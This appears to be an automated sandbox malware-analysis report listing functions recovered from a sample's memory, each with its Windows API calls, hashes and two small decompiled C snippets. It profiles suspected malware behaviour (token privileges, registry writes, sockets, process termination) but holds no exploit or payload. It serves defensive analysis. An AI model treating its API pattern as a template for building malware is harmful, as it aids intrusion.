libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 024339A5

Strings

j, xrefs: 0243382A

Memory Dump Source

Source File: 00000002.00000002.734393764.0000000002430000.00000040.00000001.sdmp, Offset: 02430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2430000_3NeufRwoxF.jbxd

Similarity

API ID: InitializeThunk
String ID: j
API String ID: 2994545307-2137352139
Opcode ID: c95c8dccdc96e6eb48554dc77265b0d35f348e6d2a7336d55ca23360cefbfacf
Instruction ID: 5e0c1f3bd7dcb5a996dcc8cfd182c7be3d54c5c41bfcf881fcb3c0c1be8ac812
Opcode Fuzzy Hash: c95c8dccdc96e6eb48554dc77265b0d35f348e6d2a7336d55ca23360cefbfacf
Instruction Fuzzy Hash: 23619E207093854FD3079B699818B763FE59F4A304F1A80FBD484CF2E3DB69D8468791

Uniqueness

Uniqueness Score: -1.00%

Function 0078AF83, Relevance: 1.6, APIs: 1, Instructions: 75COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 0078B003

Memory Dump Source

Source File: 00000002.00000002.734027746.000000000078A000.00000040.00000001.sdmp, Offset: 0078A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_78a000_3NeufRwoxF.jbxd

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: b533578ae98484bda78226b4c038c47bb50ea777641a4886205ef4e09fc89c5a
Instruction ID: 3f68f7f849f68afbb5e0141d5a1cb2e66f8229e0d358cf15e970481cefe82bb1
Opcode Fuzzy Hash: b533578ae98484bda78226b4c038c47bb50ea777641a4886205ef4e09fc89c5a
Instruction Fuzzy Hash: 8221A176509780AFEB228F25DC44B52BFB4EF16310F0885DAE9858F563D375E908CB62

Uniqueness

Uniqueness Score: -1.00%

Function 0078B105, Relevance: 1.6, APIs: 1, Instructions: 57nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 0078B171

Memory Dump Source

Source File: 00000002.00000002.734027746.000000000078A000.00000040.00000001.sdmp, Offset: 0078A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_78a000_3NeufRwoxF.jbxd

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: 15c0ccc35d84d09920a759284eb7c39053467efe41ae0f7f710b0a10972f387e
Instruction ID: 948df7d83ebf98f4543d4e71cc3f2009365a9dafc1bcf2b2c96a33bdd52f7f6a
Opcode Fuzzy Hash: 15c0ccc35d84d09920a759284eb7c39053467efe41ae0f7f710b0a10972f387e
Instruction Fuzzy Hash: 91118E724097C49FDB228B25DC85A52FFB4EF16314F0984DAE9848F163D265A908DB62

Uniqueness

Uniqueness Score: -1.00%

Function 0078AFBA, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 0078B003

Memory Dump Source

Source File: 00000002.00000002.734027746.000000000078A000.00000040.00000001.sdmp, Offset: 0078A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_78a000_3NeufRwoxF.jbxd

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: 763e788a614f7d029209e7529e8d2829f69c3125a65d3272799c5012aeb9ccc6
Instruction ID: 22380fb3a5619e3f8ea715812090b5522aeff7bf40475309d1cafbb2eda7113c
Opcode Fuzzy Hash: 763e788a614f7d029209e7529e8d2829f69c3125a65d3272799c5012aeb9ccc6
Instruction Fuzzy Hash: 741170755003009FDB20DF55D884B66FBE4EF04320F0885AAEE858B656D779E458DB72

Uniqueness

Uniqueness Score: -1.00%

Function 0078BB16, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,00000E80,?,?), ref: 0078BB66

Memory Dump Source

Source File: 00000002.00000002.734027746.000000000078A000.00000040.00000001.sdmp, Offset: 0078A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_78a000_3NeufRwoxF.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 5fca7222defb838233484e19f3a22550521fb978a0b339b23b9e9a78240d37f9
Instruction ID: 72f4b00389f9fc8ec65d777b03220f73b2df5514536dcd379b3b60698cb059da
Opcode Fuzzy Hash: 5fca7222defb838233484e19f3a22550521fb978a0b339b23b9e9a78240d37f9
Instruction Fuzzy Hash: 5201A271500600ABD214DF1ADC86B22FBA4FB89B20F148159ED084B741E231F516CBE6

Uniqueness

Uniqueness Score: -1.00%

Function 0078B136, Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 0078B171

Memory Dump Source

Source File: 00000002.00000002.734027746.000000000078A000.00000040.00000001.sdmp, Offset: 0078A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_78a000_3NeufRwoxF.jbxd

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: 69212fe876c7cb6af3426281a5f4619eb2e2476c171ad045365fb894dcec8e05
Instruction ID: f0ef30409cab4b8c45b6696afa16155bfeec71ef7549d5a35c522fca2fb5b4b9
Opcode Fuzzy Hash: 69212fe876c7cb6af3426281a5f4619eb2e2476c171ad045365fb894dcec8e05
Instruction Fuzzy Hash: D9018F359407449FDB209F55D888B22FBA0FF04720F08C49ADD890F656D379E418DB72

Uniqueness

Uniqueness Score: -1.00%

Function 00401E1D, Relevance: 1.5, APIs: 1, Instructions: 3
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401E1D() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E00401E29); // executed
				return _t1;
			}

0x00401e22
0x00401e28

APIs

SetUnhandledExceptionFilter.KERNELBASE(Function_00001E29,00401716), ref: 00401E22

Memory Dump Source

Source File: 00000002.00000002.733760702.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_3NeufRwoxF.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: f10ce909f55bf21439a7486d1ee2c3bdf37a7dd0004178b465455f206acc9e88
Instruction ID: 98c1414349b9c6d47e2858da2eafac41ced4a749a9169aad70cadcfed52b35c5
Opcode Fuzzy Hash: f10ce909f55bf21439a7486d1ee2c3bdf37a7dd0004178b465455f206acc9e88
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 05422ECC, Relevance: 3.1, APIs: 2, Instructions: 116
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexW.KERNELBASE(?,?), ref: 05422E75
shutdown.WS2_32(?,00000E80,7792E0B7,00000000,00000000,00000000,00000000), ref: 05422F60

Memory Dump Source

Source File: 00000002.00000002.735617809.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5420000_3NeufRwoxF.jbxd

Similarity

API ID: CreateMutexshutdown
String ID:
API String ID: 3897568296-0
Opcode ID: 4075443adfcff598c1930fc1e1b9a5e138fb6b84ac2ced2b7d05348141c685f5
Instruction ID: b7777936e95602d048ef33b7ca484ce437e04eb2fe885ec06a4702d47fcc7025
Opcode Fuzzy Hash: 4075443adfcff598c1930fc1e1b9a5e138fb6b84ac2ced2b7d05348141c685f5
Instruction Fuzzy Hash: 0641C3B55093809FE712CF14DC85BA6BFA8EF02324F0884EBED448F292D2759905C771

Uniqueness

Uniqueness Score: -1.00%

Function 004055C5, Relevance: 3.0, APIs: 2, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004055C5(void* __ecx) {
				void* _t6;
				void* _t14;
				void* _t18;
				WCHAR* _t19;

				_t14 = __ecx;
				_t19 = GetEnvironmentStringsW();
				if(_t19 != 0) {
					_t12 = (E0040558E(_t19) - _t19 >> 1) + (E0040558E(_t19) - _t19 >> 1);
					_t6 = E00403E3D(_t14, (E0040558E(_t19) - _t19 >> 1) + (E0040558E(_t19) - _t19 >> 1)); // executed
					_t18 = _t6;
					if(_t18 != 0) {
						E0040ACF0(_t18, _t19, _t12);
					}
					E00403E03(0);
					FreeEnvironmentStringsW(_t19);
				} else {
					_t18 = 0;
				}
				return _t18;
			}

0x004055c5
0x004055cf
0x004055d3
0x004055e4
0x004055e8
0x004055ed
0x004055f3
0x004055f8
0x004055fd
0x00405602
0x00405609
0x004055d5
0x004055d5
0x004055d5
0x00405614

APIs

GetEnvironmentStringsW.KERNEL32 ref: 004055C9
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00405609

Memory Dump Source

Source File: 00000002.00000001.655268530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_1_400000_3NeufRwoxF.jbxd

Yara matches

Similarity

API ID: EnvironmentStrings$Free
String ID:
API String ID: 3328510275-0
Opcode ID: 8cd0ade3987da643afe372fdbc3b04457b893c98baeb1de225cc927f8a7ffae8
Instruction ID: c5c85d496f4b9afafe33008ffa5735024e7f647e2ae8fec8aafe46d04be69a25
Opcode Fuzzy Hash: 8cd0ade3987da643afe372fdbc3b04457b893c98baeb1de225cc927f8a7ffae8
Instruction Fuzzy Hash: E7E0E5371049206BD22127267C8AA6B2A1DCFC17B5765063BF809B61C2AE3D8E0208FD

Uniqueness

Uniqueness Score: -1.00%

Function 0078A90D, Relevance: 1.6, APIs: 1, Instructions: 120
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(?,00000E80), ref: 0078AA05

Memory Dump Source

Source File: 00000002.00000002.734027746.000000000078A000.00000040.00000001.sdmp, Offset: 0078A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_78a000_3NeufRwoxF.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 6ffb4de3a5f0145379c273292b2652b0c8d89bc2920011e73238790194ac9e8e
Instruction ID: ecef4fc8b52df0fec7ed3e74cd0493a53447aabc358a070541b505b3bf822dd5
Opcode Fuzzy Hash: 6ffb4de3a5f0145379c273292b2652b0c8d89bc2920011e73238790194ac9e8e
Instruction Fuzzy Hash: 90413B7554D7C45FE7238B258C64B96BFB8AF07210F0984DBE980CB1A3D268A909C772

Uniqueness

Uniqueness Score: -1.00%

Function 054224F9, Relevance: 1.6, APIs: 1, Instructions: 106
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSASocketW.WS2_32(?,?,?,?,?), ref: 054225C2

Memory Dump Source

Source File: 00000002.00000002.735617809.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5420000_3NeufRwoxF.jbxd

Similarity

API ID: Socket
String ID:
API String ID: 38366605-0
Opcode ID: ffc453dcb4f1434237eb64e8960356a0095f8528c2c3ba05054aabe4dae9049f
Instruction ID: 4844303a359eaf93d033f07a3595bbcd20925893a9662cf6ba922b5ce46b41e4
Opcode Fuzzy Hash: ffc453dcb4f1434237eb64e8960356a0095f8528c2c3ba05054aabe4dae9049f
Instruction Fuzzy Hash: 8A41927540D7C0AFD7238B658C64B56BFB5EF07210F0985DBE9C48F1A3D265A808CB62

Uniqueness

Uniqueness Score: -1.00%

Function 0078A47A, Relevance: 1.6, APIs: 1, Instructions: 102
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAStartup.WS2_32(?,00000E80,?,?), ref: 0078A522

Memory Dump Source

Source File: 00000002.00000002.734027746.000000000078A000.00000040.00000001.sdmp, Offset: 0078A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_78a000_3NeufRwoxF.jbxd

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: 5023693948bbde800499af98a2ed495e525d32eecb30148010326ed6124586ba
Instruction ID: 44e4d3c952a1286f429079190de911c39d33d90613c92439ba63de6bf015770d
Opcode Fuzzy Hash: 5023693948bbde800499af98a2ed495e525d32eecb30148010326ed6124586ba
Instruction Fuzzy Hash: 83318E7140E3C06FD7138B258C64A61BFB4EF47620F1A81DBD884CF1A3D269A919C762

Uniqueness

Uniqueness Score: -1.00%

Function 05421F16, Relevance: 1.6, APIs: 1, Instructions: 102
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 05421FD5

Memory Dump Source

Source File: 00000002.00000002.735617809.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5420000_3NeufRwoxF.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 5981413eac91b322be632764efff1e1d35be1813b017e1b2f963306b87c157f3
Instruction ID: 6b8b1f93ba4e4d389e13d9b1f37f11006426e69842fd0f6028d6bd6400594068
Opcode Fuzzy Hash: 5981413eac91b322be632764efff1e1d35be1813b017e1b2f963306b87c157f3
Instruction Fuzzy Hash: 6131A171509780AFE722CF25CC44FA6BFE8EF06310F08859EE9859B252D365E909DB71

Uniqueness

Uniqueness Score: -1.00%

Function 05423177, Relevance: 1.6, APIs: 1, Instructions: 101
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

getaddrinfo.WS2_32(?,00000E80), ref: 0542324F

Memory Dump Source

Source File: 00000002.00000002.735617809.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5420000_3NeufRwoxF.jbxd

Similarity

API ID: getaddrinfo
String ID:
API String ID: 300660673-0
Opcode ID: 319660ad98685298b89edfe1a9ad5cfe8084f859850c687657e190d67d1a21cf
Instruction ID: 9c832d39d1ffe1923d5947dfc5488c379c7d3b72fd4243b538f6234be0c21d99
Opcode Fuzzy Hash: 319660ad98685298b89edfe1a9ad5cfe8084f859850c687657e190d67d1a21cf
Instruction Fuzzy Hash: F631B2B1104344AFE7228F65DC84FA6BFBCEF05310F14899AEA849F192D375A949CB71

Uniqueness

Uniqueness Score: -1.00%

Function 054234E5, Relevance: 1.6, APIs: 1, Instructions: 92
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAIoctl.WS2_32(?,00000E80,7792E0B7,00000000,00000000,00000000,00000000), ref: 05423599

Memory Dump Source

Source File: 00000002.00000002.735617809.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5420000_3NeufRwoxF.jbxd

Similarity

API ID: Ioctl
String ID:
API String ID: 3041054344-0
Opcode ID: 4530e971810467e826d7306efee55204e77a023b7aed7b6ab98cfd5a62027021
Instruction ID: 0c7db694028361d9e17394e7c25340360b98dc07ae60c249b1e202fa715d6964
Opcode Fuzzy Hash: 4530e971810467e826d7306efee55204e77a023b7aed7b6ab98cfd5a62027021
Instruction Fuzzy Hash: 61316375509784AFE7228F15CC44F92BFB8EF05310F08899AE9858B162D335E949CB61

Uniqueness

Uniqueness Score: -1.00%

Function 05421221, Relevance: 1.6, APIs: 1, Instructions: 90
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetClassInfoW.USER32 ref: 054212CA

Memory Dump Source

Source File: 00000002.00000002.735617809.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5420000_3NeufRwoxF.jbxd

Similarity

API ID: ClassInfo
String ID:
API String ID: 3534257612-0
Opcode ID: b8e102163dd912bb5cdf98c3dc67a02a1fe6279a864b1bc650343c8c469ff1fe
Instruction ID: a47f41a13480c2c2a9164431753385dbea02947dc96108b18271a69e9164b827
Opcode Fuzzy Hash: b8e102163dd912bb5cdf98c3dc67a02a1fe6279a864b1bc650343c8c469ff1fe
Instruction Fuzzy Hash: 44314E7650E3C09FD7138B259C64A52BFB4AF07214F4D80DBD885CF6A3D6699808CB72

Uniqueness

Uniqueness Score: -1.00%

Function 0078AA4D, Relevance: 1.6, APIs: 1, Instructions: 89
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryValueExW.KERNELBASE(?,00000E80,7792E0B7,00000000,00000000,00000000,00000000), ref: 0078AB08

Memory Dump Source

Source File: 00000002.00000002.734027746.000000000078A000.00000040.00000001.sdmp, Offset: 0078A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_78a000_3NeufRwoxF.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: c1720ca53aad40a6a69e150f865b947b52ce4b13177e4ea0ea0b4b6ec9f4ba65
Instruction ID: 21e6cba1e1024148aee4d05b08de266f7e684fb8c735c5941716e3669823a904
Opcode Fuzzy Hash: c1720ca53aad40a6a69e150f865b947b52ce4b13177e4ea0ea0b4b6ec9f4ba65
Instruction Fuzzy Hash: F331B1711093846FE722CF21CC84FA2BFF8EF06310F08849AE9858B153D264E948CB72

Uniqueness

Uniqueness Score: -1.00%

Function 05422888, Relevance: 1.6, APIs: 1, Instructions: 89
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(?,00000E80), ref: 0542291F

Memory Dump Source

Source File: 00000002.00000002.735617809.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5420000_3NeufRwoxF.jbxd

Similarity

API ID: DescriptorSecurity$ConvertString
String ID:
API String ID: 3907675253-0
Opcode ID: 86d9bc41353cb2155697e051d706db1b9bab429e8cfebd8a1c234c733ae8d53b
Instruction ID: 92bf2e527f7a73be582c3a4e9ce7d5d8a0f6e37e8c44d5631764c5a6adf99f83
Opcode Fuzzy Hash: 86d9bc41353cb2155697e051d706db1b9bab429e8cfebd8a1c234c733ae8d53b
Instruction Fuzzy Hash: 0E3193715083456FE722CF25DC45FA7BFECEF05310F0884AAE985DB152D264E909CB61

Uniqueness

Uniqueness Score: -1.00%

Function 05422B20, Relevance: 1.6, APIs: 1, Instructions: 87fileCOMMON

Download Yara Rule

APIs

MapViewOfFile.KERNELBASE ref: 05422BD2

Memory Dump Source

Source File: 00000002.00000002.735617809.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5420000_3NeufRwoxF.jbxd

Similarity

API ID: FileView
String ID:
API String ID: 3314676101-0
Opcode ID: 25fa07626875d2559efaf9b7f4caebb55bad796f7acdf43a4be99818e42a78ec
Instruction ID: 6b3e153509d88ca47a7afc4ee2c8cd35fe08ebd41bffe23d6172e52cbd57d848
Opcode Fuzzy Hash: 25fa07626875d2559efaf9b7f4caebb55bad796f7acdf43a4be99818e42a78ec
Instruction Fuzzy Hash: CC31B3B2404780AFE722CB15DC45F96FFF8EF06324F08459EE9849B252D365A509CB61

Uniqueness

Uniqueness Score: -1.00%

Function 054235E3, Relevance: 1.6, APIs: 1, Instructions: 87networkCOMMON

Download Yara Rule

APIs

WSAEventSelect.WS2_32(?,00000E80,7792E0B7,00000000,00000000,00000000,00000000), ref: 0542368A

Memory Dump Source

Source File: 00000002.00000002.735617809.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5420000_3NeufRwoxF.jbxd

Similarity

API ID: EventSelect
String ID:
API String ID: 31538577-0
Opcode ID: e37b2f4b5652ecbb3ac6d8cf2b60bff18296e3b97d3f16f0cb47b6a4b436148d
Instruction ID: 0332cdefe4e5c56c78dda16eaa6a4a9bfa4083a76ec5c51212ca44ae4f52ebb4
Opcode Fuzzy Hash: e37b2f4b5652ecbb3ac6d8cf2b60bff18296e3b97d3f16f0cb47b6a4b436148d
Instruction Fuzzy Hash: CE3180B14093846FE7238F259C55F96BFB8EF46324F0888DBE9849F153D224A508CB75

Uniqueness

Uniqueness Score: -1.00%

Function 0542278A, Relevance: 1.6, APIs: 1, Instructions: 87
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryValueExW.KERNELBASE(?,00000E80,7792E0B7,00000000,00000000,00000000,00000000), ref: 05422834

Memory Dump Source

Source File: 00000002.00000002.735617809.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5420000_3NeufRwoxF.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 5c59dd46cc3fca94b0f4c39a816e9171ca5684f4441c4e106115e8449a868d63
Instruction ID: ec4c0b3da3df0d3de0bd49fb9361fc223cc8f7b1c7bfc2a13ca0dafa51721590
Opcode Fuzzy Hash: 5c59dd46cc3fca94b0f4c39a816e9171ca5684f4441c4e106115e8449a868d63
Instruction Fuzzy Hash: E83180765093806FE7228B25CC44FA3BFB8EF06710F0885DBE9859B293D264E549C771

Uniqueness

Uniqueness Score: -1.00%

Function 0078B298, Relevance: 1.6, APIs: 1, Instructions: 86COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(?,00000E80,7792E0B7,00000000,00000000,00000000,00000000), ref: 0078B32C

Memory Dump Source

Source File: 00000002.00000002.734027746.000000000078A000.00000040.00000001.sdmp, Offset: 0078A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_78a000_3NeufRwoxF.jbxd

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: f820e55a283ef3ff30402efef44c6d4ed67d403ff3504ee9f985af365b949fc7
Instruction ID: d0dc106a67bd2f007327e8acae74ae516d0a52e19bc4cee0c35bdf282f24e876
Opcode Fuzzy Hash: f820e55a283ef3ff30402efef44c6d4ed67d403ff3504ee9f985af365b949fc7
Instruction Fuzzy Hash: 1E21B5B25493806FE7128F25DC45BA6BFB8EF46320F0884EBE984DF193D264D905C761

Uniqueness

Uniqueness Score: -1.00%

Function 0078B385, Relevance: 1.6, APIs: 1, Instructions: 85windowCOMMON

Download Yara Rule

APIs

FormatMessageW.KERNELBASE(?,00000E80,?,?), ref: 0078B432

Memory Dump Source

Source File: 00000002.00000002.734027746.000000000078A000.00000040.00000001.sdmp, Offset: 0078A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_78a000_3NeufRwoxF.jbxd

Similarity

API ID: FormatMessage
String ID:
API String ID: 1306739567-0
Opcode ID: e75676528c6715d94c3692e64bbd0a3cc8a08819be4a544fd3cc5aab6c825283
Instruction ID: 9e7a4ec5467c5532c29c178b21fe3f29e781749d51efac08800d103ac6bbac1a
Opcode Fuzzy Hash: e75676528c6715d94c3692e64bbd0a3cc8a08819be4a544fd3cc5aab6c825283
Instruction Fuzzy Hash: E1319E7154E3C45FD7139B258C55B62BFB4EF87610F0980DBD884CF2A3E624A909C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 05422DD5, Relevance: 1.6, APIs: 1, Instructions: 85synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexW.KERNELBASE(?,?), ref: 05422E75

Memory Dump Source

Source File: 00000002.00000002.735617809.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5420000_3NeufRwoxF.jbxd

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: f9b390990951631cf996c7e19cc89481886f820a029afa16949107a8217d1b7a
Instruction ID: cb2334805ffd86d8f8cfbc2fd4d9e14d921bd40dd0971a75ea0792d7033b49b7
Opcode Fuzzy Hash: f9b390990951631cf996c7e19cc89481886f820a029afa16949107a8217d1b7a
Instruction Fuzzy Hash: E93171B5509780AFE722CB25CC85B56FFE8EF05210F08859EE9859B292D365E908CB61

Uniqueness

Uniqueness Score: -1.00%

Function 054231AA, Relevance: 1.6, APIs: 1, Instructions: 84COMMON

Download Yara Rule

APIs

getaddrinfo.WS2_32(?,00000E80), ref: 0542324F

Memory Dump Source

Source File: 00000002.00000002.735617809.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5420000_3NeufRwoxF.jbxd

Similarity

API ID: getaddrinfo
String ID:
API String ID: 300660673-0
Opcode ID: 4a83231366915eb899fd6eb8c1b714a43d5f3d5e3fba5fc3a6d76b276694e04c
Instruction ID: c736b103a9b94035e4b8c6e323b1c90075ab043ded14a3c2e04bdf8be70abd4d
Opcode Fuzzy Hash: 4a83231366915eb899fd6eb8c1b714a43d5f3d5e3fba5fc3a6d76b276694e04c
Instruction Fuzzy Hash: 6121D1B1100304AFFB31DF55DC85FAAFBACFF04720F14885AEE449A181D674A5098B71

Uniqueness

Uniqueness Score: -1.00%

Function 0078B78D, Relevance: 1.6, APIs: 1, Instructions: 82COMMON

Download Yara Rule

APIs

K32GetModuleInformation.KERNEL32(?,00000E80,7792E0B7,00000000,00000000,00000000,00000000), ref: 0078B81E

Memory Dump Source

Source File: 00000002.00000002.734027746.000000000078A000.00000040.00000001.sdmp, Offset: 0078A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_78a000_3NeufRwoxF.jbxd

Similarity

API ID: InformationModule
String ID:
API String ID: 3425974696-0
Opcode ID: b28f81dadda33d6f0710484c60317a5e7bfee3201647af7c883cafaa76833a8c
Instruction ID: e618573e5f8f6d6febbb919530122dc7176cd0158ce220f415080e449d5d7bb6
Opcode Fuzzy Hash: b28f81dadda33d6f0710484c60317a5e7bfee3201647af7c883cafaa76833a8c
Instruction Fuzzy Hash: 8E219471549380AFE7228F25DC44F66BFA8EF46320F0884AAE985DB152D364E808CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0078B884, Relevance: 1.6, APIs: 1, Instructions: 81COMMON

Download Yara Rule

APIs

K32GetModuleFileNameExW.KERNEL32(?,00000E80,?,?), ref: 0078B92A

Memory Dump Source

Source File: 00000002.00000002.734027746.000000000078A000.00000040.00000001.sdmp, Offset: 0078A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_78a000_3NeufRwoxF.jbxd

Similarity

API ID: FileModuleName
String ID:
API String ID: 514040917-0
Opcode ID: 7a54211047fce3eb5d7d5919c429ee95931c49d1dd5ffa047c9a9956a4c54d76
Instruction ID: 218d636a3b101effd4000c474841cd22daa45ec1975c0ddb2e30fa172568ed62
Opcode Fuzzy Hash: 7a54211047fce3eb5d7d5919c429ee95931c49d1dd5ffa047c9a9956a4c54d76
Instruction Fuzzy Hash: 7F21AD715093C0AFD3128B65CC55B66BFB4EF87610F0984DBD8848F1A3D624A909C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 05423404, Relevance: 1.6, APIs: 1, Instructions: 81COMMON

Download Yara Rule

APIs

ioctlsocket.WS2_32(?,00000E80,7792E0B7,00000000,00000000,00000000,00000000), ref: 0542349B

Memory Dump Source

Source File: 00000002.00000002.735617809.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5420000_3NeufRwoxF.jbxd

Similarity

API ID: ioctlsocket
String ID:
API String ID: 3577187118-0
Opcode ID: 351950f0a7cdd3e575be081c02a73e24e43843c34f64415f7ce0d0d61075612e
Instruction ID: 3148aec4305f4630198be7409ede6210b6a890258f5ddf2bb3c667d004447af8
Opcode Fuzzy Hash: 351950f0a7cdd3e575be081c02a73e24e43843c34f64415f7ce0d0d61075612e
Instruction Fuzzy Hash: 11218071109384AFD723CF25CC85F66BFB8EF46214F0984EAE9849F153C264A909CB62

Uniqueness

Uniqueness Score: -1.00%

Function 05420DA8, Relevance: 1.6, APIs: 1, Instructions: 81registryCOMMON

Download Yara Rule

APIs

RegSetValueExW.KERNELBASE(?,00000E80,7792E0B7,00000000,00000000,00000000,00000000), ref: 05420E48

Memory Dump Source

Source File: 00000002.00000002.735617809.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5420000_3NeufRwoxF.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 561c7053fb9bf4b63bdc815264e548b53d44acfb0a56256ba30dbb73ab392e18
Instruction ID: e11ca158a1b15e5a1f43dd0b7e4af820562ed01660c2366932787eaa99c54aa3
Opcode Fuzzy Hash: 561c7053fb9bf4b63bdc815264e548b53d44acfb0a56256ba30dbb73ab392e18
Instruction Fuzzy Hash: 7F219172109384AFD7228F25CC44FA3BFF8EF46310F0885DAE9858B262D265E449CB71

Uniqueness

Uniqueness Score: -1.00%

Function 05422FB0, Relevance: 1.6, APIs: 1, Instructions: 79timeCOMMON

Download Yara Rule

APIs

GetProcessTimes.KERNELBASE(?,00000E80,7792E0B7,00000000,00000000,00000000,00000000), ref: 05423039

Memory Dump Source

Source File: 00000002.00000002.735617809.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5420000_3NeufRwoxF.jbxd

Similarity

